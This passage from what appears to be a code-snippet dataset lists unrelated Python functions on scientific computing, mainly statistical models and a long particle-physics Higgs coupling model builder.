'expr::vbfH_sbi_func(\"sqrt(@0)\", mu)')", "def estimateParameterValues(self, name, rawData):\n\n if name == self.parameterNames[0]:\n # The parameter of the Bernoulli model is naturally constrained to the [0, 1] interval\n return cint(0, 1, 1000)\n else:\n raise ConfigurationError('Bernoulli model does not contain a parameter \"{}\".'.format(name))", "def replace_parameterized_exchanges(self,sample):\n\n parameters_subsample = sample[self.i_sample : self.i_sample+len(self.parameters_array)]\n self.i_sample += len(self.parameters_array)\n\n # Convert uniform [0,1] sample to proper parameters distributions\n converted_parameters = self.convert_sample_to_proper_distribution(self.parameters_array,parameters_subsample)\n\n new_parameters = {}\n\n # Put converted 
values to parameters class, order of converted_parameters is the same as in parameters_array\n for i in range(len(self.parameters_array)):\n name = self.parameters_array[i]['name']\n new_parameters[name] = converted_parameters[i]\n\n # Update parameterized exchanges with the new converted values of parameters\n self.update_parameterized_exchanges(new_parameters)\n\n # Replace values in self.amounts_tech and self.amounts_bio\n np.put(self.amount_tech, self.parameters_dict['tech_params_where'], self.parameters_dict['tech_params_amounts'])\n np.put(self.amount_bio, self.parameters_dict['bio_params_where'], self.parameters_dict['bio_params_amounts'])", "def position_p_gain(self):\n return self._read(MX_POSITION_P_GAIN)", "def get_positional_valuation(self, features):\n\n\t\tfeatures = features.reshape(1, -1) \n\t\tmodel_val = self.model.predict_proba(features)[0][1]\n\n\t\treturn model_val", "def getModtranExtinction(self):\n if not self.modtran_wl:\n self.initModtranWavelengths()\n\n modtranDataDir = os.getenv('MODTRAN_DATADIR')\n # MODTRAN transmission outputfile\n outputfile = '{0}/{1}.plt'.format(self.outfilename, self.outfilename)\n outputpath = os.path.join(modtranDataDir, outputfile)\n # Initialize array for transmittance\n trans = numpy.zeros(len(self.modtran_wl))\n with open(outputpath, 'r') as outf:\n # File starts with data - no header\n # I use negative indices because MODTRAN prints the wavelengths\n # in decreasing order\n idx = -1\n for line in outf:\n if line.starstwith('$'):\n continue\n values = line.strip().split()\n trans[idx] = float(values[1])\n idx -= 1\n if abs(idx) > len(self.modtran_wl):\n raise ValueError(\"Too many values to unpack from MODTRAN \\\n outputfile.\")\n return trans\n # MODTRAN transmittance stored", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def _get_params(self):\r\n return np.hstack((self.variance,self.lengthscale,self.period))", "def get_custom_param(plot):\n return Plot.get_custom_param(plot)", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")", "def doParametersOfInterest(self):\n \n self.modelBuilder.doVar('expr::cosW(\"0.87681811112\",)')\n self.modelBuilder.doVar('expr::sinW(\"0.48082221247\",)')\n self.modelBuilder.doVar('expr::mZ(\"91.2\",)')\n self.modelBuilder.doVar('expr::Lambda1(\"100.0\",)')\n self.modelBuilder.doVar('expr::e2(\"0.0917\",)')\n self.modelBuilder.doVar('expr::gs2(\"1.533\",)')\n\n # EFT Higgs basis couplings\n\n self.modelBuilder.doVar('cZ[0,-1,1]') \n self.modelBuilder.doVar(\"cZZ[0,-2,2]\") \n self.modelBuilder.doVar(\"cZZt[0,-2,2]\") \n self.modelBuilder.doVar(\"cZB[0,-6,6]\") \n\n poi='cZ,cZZ,cZZt,cZB'\n\n # Amplitude couplings from EFT couplings \n\n self.modelBuilder.doVar('expr::a1(\"@0+1\",cZ)') # (\"2*(@0+1)\",cZ) in AN/Paper but a1 = 1 for signal model and width calculation\n self.modelBuilder.doVar('expr::a2(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZ,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::a3(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZt,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::k1(\"@0*(@1*pow(@2,2)/(pow(@3,2)*pow(@4,2)))\",cZB,e2,Lambda1,sinW,mZ)')\n self.modelBuilder.doVar('expr::k1L1(\"@0/pow(@1,2)\",k1,Lambda1)')\n\n ###### gamma_H ########\n\n # SMEFT 
relationships for VV couplings (Expressed using amplitude couplings)\n\n self.modelBuilder.doVar('expr::kappa(\"1.0\",)')\n self.modelBuilder.doVar('expr::kappa_tilde(\"0.0\",)') \n\n self.modelBuilder.doVar('expr::a1_WW(\"@0\",a1)')\n self.modelBuilder.doVar('expr::a2_WW(\"@0*@0*@1\",cosW,a2)')\n self.modelBuilder.doVar('expr::a3_WW(\"@0*@0*@1\",cosW,a3)')\n self.modelBuilder.doVar('expr::k1_WW(\"(@2 / (@0*@0 - @1*@1) - 2*@1*@1*@3*@4*@4 /(@5*@5*(@0*@0 - @1*@1)))\",cosW,sinW,k1,a2,Lambda1,mZ)')\n self.modelBuilder.doVar('expr::k2_k1(\"2*@0*@1*@2/(@0*@0 - @1*@1)\",cosW,sinW,k1)')\n self.modelBuilder.doVar('expr::k2_a2(\"-2*@0*@1*@3*@4*@4/((@2*@2)*(@0*@0 - @1*@1))\",cosW,sinW,mZ,a2,Lambda1)')\n self.modelBuilder.doVar('expr::k2(\"@0 + @1\",k2_k1,k2_a2)')\n\n # Determine gamma_H from VV couplings\n\n zz_expr = '\"4*(@0*@0/4. + 0.1695*@3*@3 + 0.09076*@1*@1 + 0.03809*@2*@2 + 0.8095*@0*@3/2. + 0.5046*@0*@1/2. + 0.2092*@1*@3 + 0.1023*@4*@4 + 0.1901*@0*@4/2. + 0.07429*@3*@4 + 0.04710*@1*@4) \",a1,a2,a3,k1,k2'\n ww_expr = '\"4*(@0*@0/4. + 0.1320*@3*@3 + 0.1944*@1*@1 + 0.08075*@2*@2 + 0.7204*@0*@3/2. + 0.7437*@0*@1/2. + 0.2774*@3*@1) \",a1_WW,a2_WW,a3_WW,k1_WW'\n zgamma_expr = '\"4*(1.118600*@0*@0/4. +0.0035*@1*@1 - 0.125010*@0*@1/2. + 0.000003*@1*@1 - 0.00018*@1*@1 + 0.003100*@0*@1/2. +0.00126*@2*@2 + 0.000005*@2*@2 -0.00047*@2*@2)\",a1_WW,kappa,kappa_tilde'\n gg_expr = '\"(1.1068*@0*@0 + 0.0082*@0*@0 - 0.1150*@0*@0 + 2.5717*@1*@1 + 0.0091*@1*@1 - 0.1982*@1*@1)\",kappa,kappa_tilde'\n bb_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n cc_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n tautau_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n mumu_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n gmgm_expr = '\"4*(1.6054*@0*@0/4. + 0.07312*@1*@1 - 0.6854*@0*@1/2. + 0.00002*@1*@1 - 0.0018*@1*@1 + 0.0085*@0*@1/2. 
+ 0.1699*@2*@2 + 0.00002*@2*@2 - 0.0031*@2*@2)\",a1_WW,kappa,kappa_tilde'\n \n self.modelBuilder.doVar('expr::R_WW('+str(ww_expr)+')')\n self.modelBuilder.doVar('expr::R_ZZ('+str(zz_expr)+')')\n self.modelBuilder.doVar('expr::R_Zgamma('+str(zgamma_expr)+')')\n self.modelBuilder.doVar('expr::R_gg('+str(gg_expr)+')')\n self.modelBuilder.doVar('expr::R_bb('+str(bb_expr)+')')\n self.modelBuilder.doVar('expr::R_cc('+str(cc_expr)+')')\n self.modelBuilder.doVar('expr::R_tautau('+str(tautau_expr)+')')\n self.modelBuilder.doVar('expr::R_mumu('+str(mumu_expr)+')')\n self.modelBuilder.doVar('expr:R_gammagamma('+str(gmgm_expr)+')')\n\n self.modelBuilder.doVar('expr::gammaH(\"(0.5824*@0 + 0.2137*@1 + 0.08187*@2 + 0.06272*@3 + 0.02891*@4 + 0.02619*@5 + 0.002270*@6 + 0.001533*@7 + 0.0002176*@8 )/0.9998\",R_bb,R_WW,R_gg,R_tautau,R_cc,R_ZZ,R_gammagamma,R_Zgamma,R_mumu)') \n\n ###########################\n\n self.g1V = GetCoupTerms(1,1,1,-0.0001,\"1V\") # Compensate for scaling of k1 templates \n self.g2V = GetCoupTerms(1,1,1,-0.0001,\"2V\") \n \n self.modelBuilder.doVar(\"expr::g2V_1(\\\"\"+str(self.g2V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1(\\\"((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T1_Neg(\\\"-1*((pow(@0,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_1)\") \n self.modelBuilder.doVar(\"expr::g2V_2(\\\"\"+str(self.g2V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2(\\\"((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T2_Neg(\\\"-1*((pow(@0,3)*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_2)\") \n self.modelBuilder.doVar(\"expr::g2V_3(\\\"\"+str(self.g2V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3(\\\"((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T3_Neg(\\\"-1*((pow(@0,2)*pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_3)\") \n self.modelBuilder.doVar(\"expr::g2V_4(\\\"\"+str(self.g2V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4(\\\"((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T4_Neg(\\\"-1*((@0*pow(@1,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_4)\") \n self.modelBuilder.doVar(\"expr::g2V_5(\\\"\"+str(self.g2V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5(\\\"((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T5_Neg(\\\"-1*((pow(@1,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_5)\") \n self.modelBuilder.doVar(\"expr::g2V_6(\\\"\"+str(self.g2V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6(\\\"((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T6_Neg(\\\"-1*((pow(@0,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_6)\") \n self.modelBuilder.doVar(\"expr::g2V_7(\\\"\"+str(self.g2V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7(\\\"((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T7_Neg(\\\"-1*((pow(@0,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_7)\") \n self.modelBuilder.doVar(\"expr::g2V_8(\\\"\"+str(self.g2V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T8(\\\"((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n 
self.modelBuilder.factory_(\"expr::scale_Ewk_T8_Neg(\\\"-1*((@0*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_8)\") \n self.modelBuilder.doVar(\"expr::g2V_9(\\\"\"+str(self.g2V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9(\\\"((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T9_Neg(\\\"-1*((pow(@2,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_9)\") \n self.modelBuilder.doVar(\"expr::g2V_10(\\\"\"+str(self.g2V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10(\\\"((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T10_Neg(\\\"-1*((pow(@0,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_10)\") \n self.modelBuilder.doVar(\"expr::g2V_11(\\\"\"+str(self.g2V[10])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11(\\\"((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T11_Neg(\\\"-1*((pow(@0,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_11)\") \n self.modelBuilder.doVar(\"expr::g2V_12(\\\"\"+str(self.g2V[11])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12(\\\"((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T12_Neg(\\\"-1*((@0*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_12)\") \n self.modelBuilder.doVar(\"expr::g2V_13(\\\"\"+str(self.g2V[12])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13(\\\"((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T13_Neg(\\\"-1*((pow(@3,4))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_13)\") \n self.modelBuilder.doVar(\"expr::g2V_14(\\\"\"+str(self.g2V[13])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14(\\\"((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T14_Neg(\\\"-1*((pow(@1,3)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_14)\") \n self.modelBuilder.doVar(\"expr::g2V_15(\\\"\"+str(self.g2V[14])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15(\\\"((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T15_Neg(\\\"-1*((pow(@1,2)*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_15)\") \n self.modelBuilder.doVar(\"expr::g2V_16(\\\"\"+str(self.g2V[15])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16(\\\"((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T16_Neg(\\\"-1*((@1*pow(@2,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_16)\") \n self.modelBuilder.doVar(\"expr::g2V_17(\\\"\"+str(self.g2V[16])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17(\\\"((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T17_Neg(\\\"-1*((pow(@1,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_17)\") \n self.modelBuilder.doVar(\"expr::g2V_18(\\\"\"+str(self.g2V[17])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18(\\\"((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T18_Neg(\\\"-1*((pow(@1,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_18)\") \n self.modelBuilder.doVar(\"expr::g2V_19(\\\"\"+str(self.g2V[18])+\"\\\",)\") \n 
self.modelBuilder.factory_(\"expr::scale_Ewk_T19(\\\"((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T19_Neg(\\\"-1*((@1*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_19)\") \n self.modelBuilder.doVar(\"expr::g2V_20(\\\"\"+str(self.g2V[19])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20(\\\"((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T20_Neg(\\\"-1*((pow(@2,3)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_20)\") \n self.modelBuilder.doVar(\"expr::g2V_21(\\\"\"+str(self.g2V[20])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21(\\\"((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T21_Neg(\\\"-1*((pow(@2,2)*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_21)\") \n self.modelBuilder.doVar(\"expr::g2V_22(\\\"\"+str(self.g2V[21])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22(\\\"((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T22_Neg(\\\"-1*((@2*pow(@3,3))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_22)\") \n self.modelBuilder.doVar(\"expr::g2V_23(\\\"\"+str(self.g2V[22])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23(\\\"((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T23_Neg(\\\"-1*((@0*@1*pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_23)\") \n self.modelBuilder.doVar(\"expr::g2V_24(\\\"\"+str(self.g2V[23])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24(\\\"((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T24_Neg(\\\"-1*((@0*pow(@1,2)*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_24)\") \n self.modelBuilder.doVar(\"expr::g2V_25(\\\"\"+str(self.g2V[24])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25(\\\"((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T25_Neg(\\\"-1*((pow(@0,2)*@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_25)\") \n self.modelBuilder.doVar(\"expr::g2V_26(\\\"\"+str(self.g2V[25])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26(\\\"((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T26_Neg(\\\"-1*((@0*@1*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_26)\") \n self.modelBuilder.doVar(\"expr::g2V_27(\\\"\"+str(self.g2V[26])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27(\\\"((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T27_Neg(\\\"-1*((@0*pow(@1,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_27)\") \n self.modelBuilder.doVar(\"expr::g2V_28(\\\"\"+str(self.g2V[27])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28(\\\"((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T28_Neg(\\\"-1*((pow(@0,2)*@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_28)\") \n self.modelBuilder.doVar(\"expr::g2V_29(\\\"\"+str(self.g2V[28])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29(\\\"((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T29_Neg(\\\"-1*((@0*@2*pow(@3,2))/@4)*@5\\\", a1, a2, 
a3, k1L1, gammaH, g2V_29)\") \n self.modelBuilder.doVar(\"expr::g2V_30(\\\"\"+str(self.g2V[29])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30(\\\"((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T30_Neg(\\\"-1*((@0*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_30)\") \n self.modelBuilder.doVar(\"expr::g2V_31(\\\"\"+str(self.g2V[30])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31(\\\"((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T31_Neg(\\\"-1*((pow(@0,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_31)\") \n self.modelBuilder.doVar(\"expr::g2V_32(\\\"\"+str(self.g2V[31])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32(\\\"((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T32_Neg(\\\"-1*((@1*@2*pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_32)\") \n self.modelBuilder.doVar(\"expr::g2V_33(\\\"\"+str(self.g2V[32])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33(\\\"((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T33_Neg(\\\"-1*((@1*pow(@2,2)*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_33)\") \n self.modelBuilder.doVar(\"expr::g2V_34(\\\"\"+str(self.g2V[33])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34(\\\"((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T34_Neg(\\\"-1*((pow(@1,2)*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_34)\") \n self.modelBuilder.doVar(\"expr::g2V_35(\\\"\"+str(self.g2V[34])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35(\\\"((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n self.modelBuilder.factory_(\"expr::scale_Ewk_T35_Neg(\\\"-1*((@0*@1*@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g2V_35)\") \n \n self.modelBuilder.doVar(\"expr::g1V_1(\\\"\"+str(self.g1V[0])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1(\\\"((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T1_Neg(\\\"-1*((pow(@0,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_1)\") \n self.modelBuilder.doVar(\"expr::g1V_2(\\\"\"+str(self.g1V[1])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2(\\\"((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T2_Neg(\\\"-1*((@0*@1)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_2)\") \n self.modelBuilder.doVar(\"expr::g1V_3(\\\"\"+str(self.g1V[2])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3(\\\"((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T3_Neg(\\\"-1*((pow(@1,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_3)\") \n self.modelBuilder.doVar(\"expr::g1V_4(\\\"\"+str(self.g1V[3])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4(\\\"((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T4_Neg(\\\"-1*((@0*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_4)\") \n self.modelBuilder.doVar(\"expr::g1V_5(\\\"\"+str(self.g1V[4])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T5(\\\"((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n 
self.modelBuilder.factory_(\"expr::scale_ggH_T5_Neg(\\\"-1*((pow(@2,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_5)\") \n self.modelBuilder.doVar(\"expr::g1V_6(\\\"\"+str(self.g1V[5])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6(\\\"((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T6_Neg(\\\"-1*((@0*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_6)\") \n self.modelBuilder.doVar(\"expr::g1V_7(\\\"\"+str(self.g1V[6])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7(\\\"((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T7_Neg(\\\"-1*((pow(@3,2))/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_7)\") \n self.modelBuilder.doVar(\"expr::g1V_8(\\\"\"+str(self.g1V[7])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8(\\\"((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T8_Neg(\\\"-1*((@1*@2)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_8)\") \n self.modelBuilder.doVar(\"expr::g1V_9(\\\"\"+str(self.g1V[8])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9(\\\"((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T9_Neg(\\\"-1*((@1*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_9)\") \n self.modelBuilder.doVar(\"expr::g1V_10(\\\"\"+str(self.g1V[9])+\"\\\",)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10(\\\"((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n self.modelBuilder.factory_(\"expr::scale_ggH_T10_Neg(\\\"-1*((@2*@3)/@4)*@5\\\", a1, a2, a3, k1L1, gammaH, g1V_10)\") \n \n self.modelBuilder.doSet(\"POI\",poi)", "def sample_parameters_prior(self, n_samples, random_seed=None):\n\n if random_seed is not None:\n np.random.seed(random_seed)\n samples = []\n samples.append(self.var_noise.sample_from_prior(n_samples))\n samples.append(self.mean.sample_from_prior(n_samples))\n samples.append(self.kernel.sample_parameters(n_samples))\n\n return np.concatenate(samples, 1)", "def get_prev_samples(self):\n return self.y_p", "def get_param_sample_weight(self, name):\n if name == 'negbin_r_0':\n weights = np.asarray(self.model.p_outlier_total[:, 0])\n elif name == 'negbin_r_1':\n weights = np.asarray(self.model.p_outlier_total[:, 1])\n elif name == 'betabin_M_0':\n weights = np.asarray(self.model.p_outlier_allele[:, 0])\n elif name == 'betabin_M_1':\n weights = 